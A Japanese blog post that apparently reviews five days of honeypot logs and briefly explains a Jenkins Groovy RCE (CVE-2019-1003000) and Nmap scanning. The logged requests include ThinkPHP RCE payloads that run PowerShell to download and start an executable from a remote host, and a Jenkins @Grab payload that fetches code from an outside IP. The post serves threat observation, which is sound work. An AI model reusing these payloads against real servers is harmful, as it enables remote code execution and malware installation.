ハニーポットログ観察3-3
5/5~5/9までのログを見ていきたいと思います。
アクセス先
GET /console/login/LoginForm.jsp GET http://www.google.com/intl/zh-CN/ GET /acadmin.php GET http://[]/testget?q=23333&port=80 *1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('[]/download.exe','C:/Windows/temp/qkkhbrukxwmomfv21893.exe');start%20C:/Windows/temp/qkkhbrukxwmomfv21893.exe *2 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('[]/download.exe','C:/Windows/temp/qkkhbrukxwmomfv21893.exe');start%20C:/Windows/temp/qkkhbrukxwmomfv21893.exe GET /js/preload/example.txt GET /cgi-bin GET /admin-scripts.asp GET /2/wp-login.php GET /3/wp-login.php GET /wordpress/wp-login.php GET /wp1/wp-login.php GET /wp-login.php GET ///?author=1 GET ///wp-json/wp/v2/users/ GET /struts2-rest-showcase/orders.xhtml GET /index.action //ソースコード付 GET /TP/public/index.php GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 GET /nmaplowercheck1557288129 GET /NmapUpperCheck1557288129 GET /Nmap/folder/check1557288129 GET /evox/about GET /HNAP1 GET /struts2-rest-showcase/orders.xhtml GET /index.action GET /index.do GET http[:]//www.sbjudge3.com/azenv.php GET /js/preload/example.txt GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27LFZQExtWuxjVTXjsqGnebQq%27,%20root=%27http[:]//185.162.235[.]211%27)%0a@Grab(group=%27package%27,%20module=%27LFZQExtWuxjVTXjsqGnebQq%27,%20version=%271%27)%0aimport%20LFZQExtWuxjVTXjsqGnebQq; GET /device.rsp?opt=user&cmd=list GET /device.rsp?opt=user&cmd=list POST /3/xmlrpc.php POST /TP/public/index.php?s=captcha POST /users?page=&size=5 POST /sdk *3 POST /2/xmlrpc.php POST /xmlrpc.php POST /wp1/xmlrpc.php POST /3/xmlrpc.php HEAD / HEAD HEAD http[:]//112.124.42[.]80:63435//robots.txt CONNECT www.netflix.com:443
virus total: 1 VirusTotal
code 3(サイトは無害)
<soap:Envelope xmlns:xsd="http[:]//www.w3.org/2001/XMLSchema" xmlns:xsi="http[:]//www.w3.org/2001/XMLSchema-instance" xmlns:soap="http[:]//schemas.xmlsoap.org/soap/envelope/"><soap:Header>
考察
1.GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile~
Jenkinsの脆弱性をついた攻撃 Jenkinsとは Jenkins - Wikipedia
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003000
ユーザーが未認証のGETリクエストを発行してGroovyメタプログラミング入力を送ることができる。 このサイトに詳しく書いてある。 https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html
2.POST /sdk
Nmapによるポートスキャン
感想
新しい物について触れているので今回は内容浅めです。 新しい物がでてきたらそれについての記事を書いてみようかなと思います。